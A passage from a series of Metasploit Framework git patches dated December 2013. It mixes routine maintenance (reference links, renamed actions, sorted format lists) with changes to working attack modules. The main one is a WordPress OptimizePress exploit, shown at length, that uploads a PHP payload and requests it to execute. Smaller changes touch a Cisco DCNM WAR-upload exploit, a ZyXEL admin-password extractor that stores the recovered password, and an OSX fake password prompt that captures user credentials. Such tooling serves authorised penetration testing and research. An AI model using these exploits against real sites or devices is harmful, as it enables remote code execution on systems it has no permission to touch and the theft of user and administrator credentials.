+      fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
+    end
+
+    print_good("#{peer} - Our payload is at: #{payload_url}! Executing payload...")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => payload_url
+    })
+
+    if res and res.code != 200
+      print_error("#{peer} - Server returned #{res.code.to_s}")
+    else
+      print_good("#{peer} - Payload executed successfully")
+    end
+  end
+end

From 8254c0bae2a8e3b13d4ed5b26fe204f15c5068a2 Mon Sep 17 00:00:00 2001
From: yehualiu <yehualiu0@gmail.com>
Date: Sun, 1 Dec 2013 14:26:03 +0800
Subject: [PATCH 138/217] this site is down

---
 lib/msf/core/module/reference.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/lib/msf/core/module/reference.rb b/lib/msf/core/module/reference.rb
index 9690cc301e..335d9ddd3f 100644
--- a/lib/msf/core/module/reference.rb
+++ b/lib/msf/core/module/reference.rb
@@ -102,8 +102,6 @@ class Msf::Module::SiteReference < Msf::Module::Reference
       self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
     elsif (in_ctx_id == 'MSB')
       self.site = 'http://www.microsoft.com/technet/security/bulletin/' + in_ctx_val.to_s + '.mspx'
-    elsif (in_ctx_id == 'MIL')
-      self.site = 'http://milw0rm.com/metasploit/' + in_ctx_val.to_s
     elsif (in_ctx_id == 'EDB')
       self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s
     elsif (in_ctx_id == 'WVE')

From 57b7d89f4d55cba939f6218091d01a96525c3ef3 Mon Sep 17 00:00:00 2001
From: Mekanismen <mattias@gotroot.eu>
Date: Sun, 1 Dec 2013 09:06:41 +0100
Subject: [PATCH 139/217] Updated

---
 .../exploits/unix/webapp/php_wordpress_optimizepress.rb  | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
index f725a751d5..4c5cfd5baf 100644
--- a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
@@ -21,6 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'         => MSF_LICENSE,
       'References'      =>
       [
+        [ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
       ],
       'Privileged'      => false,
       'Platform'        => ['php'],
@@ -42,10 +43,10 @@ class Metasploit3 < Msf::Exploit::Remote
     'uri'      => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
     })
 
-    if res and res.code == 200
-      return Exploit::CheckCode::Vulnerable
-    else
+    if not res or res.code != 200
       return Exploit::CheckCode::Safe
+    elsif res and res.code == 200
+      return Exploit::CheckCode::Vulnerable
     end
   end
 
@@ -71,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     #set cookie
-    cookie = res.headers['Set-Cookie']
+    cookie = res.get_cookies
 
     filename = rand_text_alphanumeric(8) + ".php"
 

From ef77b7fbbf0926dacbd405aa3115cd0fe9eb6a25 Mon Sep 17 00:00:00 2001
From: Sven Vetsch / Disenchant <sven.vetsch@disenchant.ch>
Date: Sun, 1 Dec 2013 17:36:15 +0100
Subject: [PATCH 140/217] added reference as requested at
 https://github.com/rapid7/metasploit-framework/pull/2709

---
 modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
index f16cb9160a..0c98b452c8 100644
--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -21,6 +21,7 @@ class Metasploit3 < Msf::Auxiliary
       },
       'References'  =>
         [
+          'https://github.com/rapid7/metasploit-framework/pull/2709'
         ],
       'Author'      => [
         'Daniel Manser', # @antsygeek

From 8e73023baa8c56345e5a8df5c0a704a554686b2a Mon Sep 17 00:00:00 2001
From: Sven Vetsch / Disenchant <sven.vetsch@disenchant.ch>
Date: Sun, 1 Dec 2013 17:38:35 +0100
Subject: [PATCH 141/217] and now in the correct data structure

---
 modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
index 0c98b452c8..505e3c62b9 100644
--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
       },
       'References'  =>
         [
-          'https://github.com/rapid7/metasploit-framework/pull/2709'
+          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
         ],
       'Author'      => [
         'Daniel Manser', # @antsygeek

From b9192c64aab0e9e5a8bda492450ce235cf30a8bf Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sun, 1 Dec 2013 19:55:53 -0600
Subject: [PATCH 142/217] Fix @wchen-r7's feedback

---
 modules/exploits/multi/http/cisco_dcnm_upload.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
index 369115a4d9..469386c49f 100644
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe
     end
 
-    if version =~ /6.1/
+    if version =~ /6\.1/
       return Exploit::CheckCode::Vulnerable
     end
 
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'method' => 'GET'
         })
       # Failure. The request timed out or the server went away.
-      break if res.nil?
+      fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
       # Success! Triggered the payload, should have a shell incoming
       break if res.code == 200
     end

From 2de9a4f3c12b3de990d595c911676cb74ce4b088 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sun, 1 Dec 2013 20:13:54 -0600
Subject: [PATCH 143/217] Add support for 10.5 shares.

---
 modules/post/osx/manage/mount_share.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index be6d5b1701..40e08986a3 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -134,7 +134,7 @@ class Metasploit3 < Msf::Post
     # and their corresponding ptcl and srvr attributes
     list = []
     lines.each_with_index do |line, x|
-      if line =~ /"desc"<blob>="Network Password"/ && x < lines.length-2
+      if line =~ /"desc"<blob>=("Network Password"|<NULL>)/ && x < lines.length-2
         # Remove everything up to the double-quote after the equal sign,
         # and also the trailing double-quote
         if lines[x+1].match "^.*\=\"(.*)\w*\"\w*$"

From 040a629f344081fa285716e92f82fcb17da711b1 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sun, 1 Dec 2013 20:17:43 -0600
Subject: [PATCH 144/217] Kill meterpreter support.

* Meterpreter seems to fall over on the cmd escaping, and dies if you
try to pass it an array of args (python/java meterpreter on various versions
of osx).
---
 modules/post/osx/manage/mount_share.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index 40e08986a3..27a70247d9 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post
             'joev'
           ],
         'Platform'      => [ 'osx' ],
-        'SessionTypes'  => [ 'shell', 'meterpreter' ],
+        'SessionTypes'  => [ 'shell' ],
         'Actions'       => [
           [ 'LIST',    { 'Description' => 'Show a list of stored network share credentials' } ],
           [ 'MOUNT',   { 'Description' => 'Mount a network shared volume using stored credentials' } ],

From 474a03475f49a612575bc1e0df7f5061e10f6c6c Mon Sep 17 00:00:00 2001
From: corelanc0d3r <peter.ve@corelan.be>
Date: Mon, 2 Dec 2013 11:57:52 +0100
Subject: [PATCH 145/217] sorted out the sorts without .sort

---
 lib/msf/base/simple/buffer.rb | 39 +++++++++++++++++++++--------------
 lib/msf/util/exe.rb           | 23 ++++++++++++++++++---
 msfvenom                      |  4 ++--
 3 files changed, 45 insertions(+), 21 deletions(-)

diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb
index eae124d5aa..a20ea9e0c0 100644
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -90,22 +90,29 @@ module Buffer
   # Returns the list of supported formats
   #
   def self.transform_formats
-    ['raw',
-    'num',
-    'dword','dw',
-    'ruby','rb',
-    'perl','pl',
-    'bash','sh',
-    'c',
-    'csharp',
-    'js_be',
-    'js_le',
-    'java',
-    'python','py',
-    'powershell','ps1',
-    'vbscript',
-    'vbapplication'
-    ].sort
+    [
+      'bash',
+      'c',
+      'csharp',
+      'dw',
+      'dword',
+      'java',
+      'js_be',
+      'js_le',
+      'num',
+      'perl',
+      'pl',
+      'powershell',
+      'ps1',
+      'py',
+      'python',
+      'raw',
+      'rb',
+      'ruby',
+      'sh',
+      'vbapplication',
+      'vbscript'
+    ]
   end
 
 end
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 091a40e2eb..776cedcb74 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1729,9 +1729,26 @@ def self.to_vba(framework,code,opts={})
 
   def self.to_executable_fmt_formats
     [
-      'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
-      'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net', 'msi', 'msi-nouac'
-    ].sort
+      "asp",
+      "aspx",
+      "aspx-exe",
+      "dll",
+      "elf",
+      "exe",
+      "exe-only",
+      "exe-service",
+      "exe-small",
+      "loop-vbs",
+      "macho",
+      "msi",
+      "msi-nouac",
+      "psh",
+      "psh-net",
+      "vba",
+      "vba-exe",
+      "vbs",
+      "war"
+    ]
   end
 
   #
diff --git a/msfvenom b/msfvenom
index 4d258fda18..1fe9e13c18 100755
--- a/msfvenom
+++ b/msfvenom
@@ -147,9 +147,9 @@ class MsfVenom
     opt.on_tail('--help-formats', String, "List available formats") do
       init_framework(:module_types => [])
       msg = "Executable formats\n" +
-            "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.sort.join(", ") + "\n" +
+            "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
             "Transform formats\n" +
-            "\t" + ::Msf::Simple::Buffer.transform_formats.sort.join(", ")
+            "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
       raise UsageError, msg
     end
 

From 433d21730e25a6cbf7812cb4749e62efea531e4a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 2 Dec 2013 08:42:25 -0600
Subject: [PATCH 146/217] Add ATTEMPTS option

---
 modules/exploits/multi/http/cisco_dcnm_upload.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
index 469386c49f..951f64540f 100644
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -52,7 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/'])
+        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
+        OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
       ], self.class)
   end
 
@@ -110,6 +111,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    attempts = datastore['ATTEMPTS']
+    fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
+
     app_base = rand_text_alphanumeric(4+rand(32-4))
 
     # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
@@ -128,6 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
     end
 
+
     10.times do
       select(nil, nil, nil, 2)
 

From 41f8a346836023b26cf55a1184166c9c19979c5c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 2 Dec 2013 08:43:22 -0600
Subject: [PATCH 147/217] Use attempts

---
 modules/exploits/multi/http/cisco_dcnm_upload.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
index 951f64540f..c599d9da29 100644
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
 
-    10.times do
+    attempts.times do
       select(nil, nil, nil, 2)
 
       # Now make a request to trigger the newly deployed war

From 8d6a5345822d43ed43621ff87b9160071ebd0972 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 2 Dec 2013 08:54:37 -0600
Subject: [PATCH 148/217] Change title

---
 modules/auxiliary/scanner/http/oracle_ilom_login.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
index efca387381..3df56764ac 100644
--- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb
+++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => 'Oracle ILO Manager Login Utility',
+      'Name'           => 'Oracle ILO Manager Login Brute Force Utility',
       'Description'    => %{
         This module scans for Oracle Integrated Lights Out Manager login portal, and performs login brute force
         to identify valid credentials.

From cc2b7950bf8a120cf3a57b67bd3d8422d2002104 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 2 Dec 2013 09:21:36 -0600
Subject: [PATCH 149/217] Do minor cleanup to mount_share

---
 modules/post/osx/manage/mount_share.rb | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index 27a70247d9..972e23750f 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -23,7 +23,8 @@ class Metasploit3 < Msf::Post
     super( update_info( info,
         'Name'          => 'OSX Network Share Mounter',
         'Description'   => %q{
-          This module lists saved network shares and tries to connect to them using stored credentials. This does not require root privileges.
+          This module lists saved network shares and tries to connect to them using stored
+          credentials. This does not require root privileges.
         },
         'License'       => MSF_LICENSE,
         'Author'        =>
@@ -36,7 +37,7 @@ class Metasploit3 < Msf::Post
         'Actions'       => [
           [ 'LIST',    { 'Description' => 'Show a list of stored network share credentials' } ],
           [ 'MOUNT',   { 'Description' => 'Mount a network shared volume using stored credentials' } ],
-          [ 'UNMOUNT', { 'Description' => 'Unmount a mounted volume' } ]
+          [ 'UMOUNT',  { 'Description' => 'Unmount a mounted volume' } ]
         ],
         'DefaultAction' => 'LIST'
       ))
@@ -117,8 +118,8 @@ class Metasploit3 < Msf::Post
       end
     elsif action.name == 'MOUNT'
       mount
-    elsif action.name == 'UNMOUNT'
-      unmount
+    elsif action.name == 'UMOUNT'
+      umount
     end
   end
 
@@ -193,7 +194,7 @@ class Metasploit3 < Msf::Post
     cmd_exec("#{osascript_path} -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'")
   end
 
-  def unmount
+  def umount
     share_name = datastore['VOLUME']
     print_status("Disconnecting from #{share_name}")
     cmd_exec("#{osascript_path} -e 'tell app \"finder\" to eject \"#{share_name}\"'")

From cb98d68e4797e9eeb48a2f5dc19b17ff37a7d4ce Mon Sep 17 00:00:00 2001
From: Sven Vetsch / Disenchant <sven.vetsch@disenchant.ch>
Date: Mon, 2 Dec 2013 18:35:59 +0100
Subject: [PATCH 150/217] added @wchen-r7's code to store the password into the
 database

---
 .../admin/http/zyxel_admin_password_extractor.rb  | 15 ++++++++++-----
 1 file changed, 10 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
index 505e3c62b9..bd452486bc 100644
--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -21,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary
       },
       'References'  =>
         [
-          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
         ],
       'Author'      => [
         'Daniel Manser', # @antsygeek
@@ -60,6 +57,14 @@ class Metasploit3 < Msf::Auxiliary
     else
       admin_password = admin_password_matches[1];
       print_good("Password for user 'admin' is: #{admin_password}")
+      report_auth_info(
+          :host   => rhost,
+          :port   => rport,
+          :sname  => "ZyXEL GS1510-16",
+          :user   => 'admin',
+          :pass   => admin_password,
+          :active => true
+      )
     end
   rescue ::Rex::ConnectionError
     print_error("#{rhost}:#{rport} - Failed to connect")

From 39fbb59ba917efb845fd226adc2d94c2c978e402 Mon Sep 17 00:00:00 2001
From: Sven Vetsch / Disenchant <sven.vetsch@disenchant.ch>
Date: Mon, 2 Dec 2013 19:06:19 +0100
Subject: [PATCH 151/217] re-added the reference I accidentally deleted

---
 modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
index bd452486bc..63f8c22fd2 100644
--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -19,6 +19,7 @@ class Metasploit3 < Msf::Auxiliary
       },
       'References'  =>
         [
+          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
         ],
       'Author'      => [
         'Daniel Manser', # @antsygeek

From d1dd7c291bdc447e1b24b62299518293cf75f3a5 Mon Sep 17 00:00:00 2001
From: Joshua Harper <josh@radixtx.com>
Date: Mon, 2 Dec 2013 13:16:48 -0600
Subject: [PATCH 152/217] cosmetic (indentation)
 https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7977962

---
 modules/post/windows/gather/forensics/gather_browser_history.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index 3f9dbbc587..ab17523d64 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
     super( update_info( info,
         'Name' => 'Windows Gather Skype, Firefox, and Chrome Artifacts',
         'Description' => %q{
-Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.
+          Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>' ],

From 44e37f1b98f3eb1ac2546b65612a661652bab587 Mon Sep 17 00:00:00 2001
From: Peter Toth <peter.toth@sucaba.eu>
Date: Mon, 2 Dec 2013 21:43:58 +0100
Subject: [PATCH 153/217] Improved meterpreter compatibility

---
 modules/post/osx/gather/password_prompt_spoof.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb
index 7bfa70ee95..cada8372aa 100644
--- a/modules/post/osx/gather/password_prompt_spoof.rb
+++ b/modules/post/osx/gather/password_prompt_spoof.rb
@@ -58,10 +58,10 @@ class Metasploit3 < Msf::Post
     ], self.class)
   end
 
-  def cmd_exec(str)
-    print_status "Running cmd '#{str}'..."
-    super
-  end
+#  def cmd_exec(str, args)
+#    print_status "Running cmd '#{str} #{args}'..."
+#    super
+#  end
 
   # Run Method for when run command is issued
   def run
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Post
 
     # write the credentials script and run
     write_file(creds_osa,creds_script(pass_file))
-    cmd_exec("cat #{creds_osa} | osascript")
+    cmd_exec("osascript #{creds_osa}")
 
     print_status("Waiting for user '#{username}' to enter credentials...")
 

From 79a6f8c2ea8b12fa385c1d8e32f8c8672bf3dc7b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 2 Dec 2013 15:43:41 -0600
Subject: [PATCH 154/217] Clean php_wordpress_optimizepress

---
 .../webapp/php_wordpress_optimizepress.rb     | 117 +++++++++---------
 1 file changed, 60 insertions(+), 57 deletions(-)

diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
index 4c5cfd5baf..d9da98b370 100644
--- a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
@@ -1,73 +1,81 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 require 'msf/core'
-require 'nokogiri'
+require 'uri'
 
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::HTTP::Wordpress
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
       'Name'            => 'WordPress OptimizePress Themes File Upload Vulnerability',
       'Description'     => %q{
-        This module exploits a PHP file upload vulnerability against the Wordpress theme
-        OptimizePress.
+        This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The
+        vulnerability is due to an insecure file upload on the media-upload.php component, allowing
+        an attacker to upload arbitrary PHP code. This module has been tested successfully on
+        OptimizePress 1.45.
       },
       'Author'          =>
-      [
-        'United of Muslim Cyber Army', # Vulnerability discovery
-        'Mekanismen', # Metasploit module
-      ],
+        [
+          'United of Muslim Cyber Army', # Vulnerability discovery
+          'Mekanismen' # Metasploit module
+        ],
       'License'         => MSF_LICENSE,
       'References'      =>
-      [
-        [ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
-      ],
+        [
+          [ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
+        ],
       'Privileged'      => false,
       'Platform'        => ['php'],
       'Arch'            => ARCH_PHP,
-      'Payload'         =>
-      {
-      'DisableNops'     => true,
-      },
       'Targets'         => [ ['OptimizePress', {}] ],
       'DefaultTarget'   => 0,
       'DisclosureDate'  => 'Nov 29 2013'
-      ))
+    ))
+
+    register_advanced_options(
+      [
+        OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress'])
+      ])
   end
 
   def check
     uri = target_uri.path
     res = send_request_cgi({
-    'method'   => 'GET',
-    'uri'      => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
+      'method'   => 'GET',
+      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
     })
 
-    if not res or res.code != 200
-      return Exploit::CheckCode::Safe
-    elsif res and res.code == 200
-      return Exploit::CheckCode::Vulnerable
+    if res and res.code == 200 and res.body.to_s =~ /Upload New Image/
+      return Exploit::CheckCode::Appears
     end
+
+    return Exploit::CheckCode::Safe
   end
 
   def exploit
     uri = normalize_uri(target_uri.path)
-    peer = "#{rhost}:#{rport}"
 
     #get upload filepath
+    print_status("#{peer} - Getting the upload path...")
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
+      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
     })
 
-    if not res or res.code != 200
+    unless res and res.code == 200
       fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
     end
 
-    html = Nokogiri::HTML(res.body)
-    filepath = html.xpath("//*[@id='imgpath']").attr("value")
-
-    if filepath == "" or filepath == nil
+    if res.body =~ /<input name="imgpath" type="hidden" id="imgpath" value="(.*)" \/>/
+      file_path = $1
+    else
       fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
     end
 
@@ -81,16 +89,16 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#{filename}\"")
     post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"")
     post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"")
-    post_data.add_part("#{filepath}", nil, nil, "form-data; name=\"imgpath\"")
+    post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"")
 
-    print_status("#{peer} - Sending PHP payload")
+    print_status("#{peer} - Uploading PHP payload...")
 
     n_data = post_data.to_s
     n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php'),
+      'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
       'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
       'data' => n_data,
       'headers' => {
@@ -99,46 +107,41 @@ class Metasploit3 < Msf::Exploit::Remote
       'cookie' => cookie
     })
 
-    if not res or res.code != 200
+    unless res and res.code == 200
       fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
-    else
-       print_good("#{peer} - Payload uploaded successfully")
     end
 
+    print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
     #get path to payload
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
+      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
     })
 
-    if not res or res.code != 200
+    unless res and res.code == 200
       fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
     end
 
     payload_url = ""
 
-    html = Nokogiri::HTML(res.body)
-    elems = html.xpath("//*[@name='cs_img']")
-    for elem in elems
-      if elem.attr("value") =~ /#{filename}/
-        payload_url = elem.attr("value")
-      end
-    end
-
-    if payload_url == ""
-      fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
-    end
-
-    print_good("#{peer} - Our payload is at: #{payload_url}! Executing payload...")
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => payload_url
-    })
-
-    if res and res.code != 200
-      print_error("#{peer} - Server returned #{res.code.to_s}")
+    if res.body =~ /name="cs_img" value="(.*#{file_path}.*)" \/> <span/
+      payload_url =$1
     else
-      print_good("#{peer} - Payload executed successfully")
+      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
     end
+
+    begin
+      u = URI(payload_url)
+    rescue ::URI::InvalidURIError
+      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
+    end
+
+    register_files_for_cleanup(File::basename(u.path))
+
+    print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => u.path
+    })
   end
 end

From 55847ce074e280fcdc636960d2e33db4f8b7eca5 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 2 Dec 2013 16:19:05 -0600
Subject: [PATCH 155/217] Fixup for release

Notably, adds a description for the module landed in #2709.
---
 .../admin/http/zyxel_admin_password_extractor.rb         | 8 ++++++--
 .../auxiliary/scanner/http/openmind_messageos_login.rb   | 4 ++--
 modules/auxiliary/scanner/http/oracle_ilom_login.rb      | 4 ++--
 modules/exploits/linux/http/netgear_readynas_exec.rb     | 9 +++++----
 modules/exploits/multi/http/cisco_dcnm_upload.rb         | 2 +-
 modules/exploits/unix/webapp/kimai_sqli.rb               | 2 +-
 .../browser/ms13_022_silverlight_script_object.rb        | 2 +-
 modules/exploits/windows/scada/abb_wserver_exec.rb       | 2 +-
 8 files changed, 19 insertions(+), 14 deletions(-)

diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
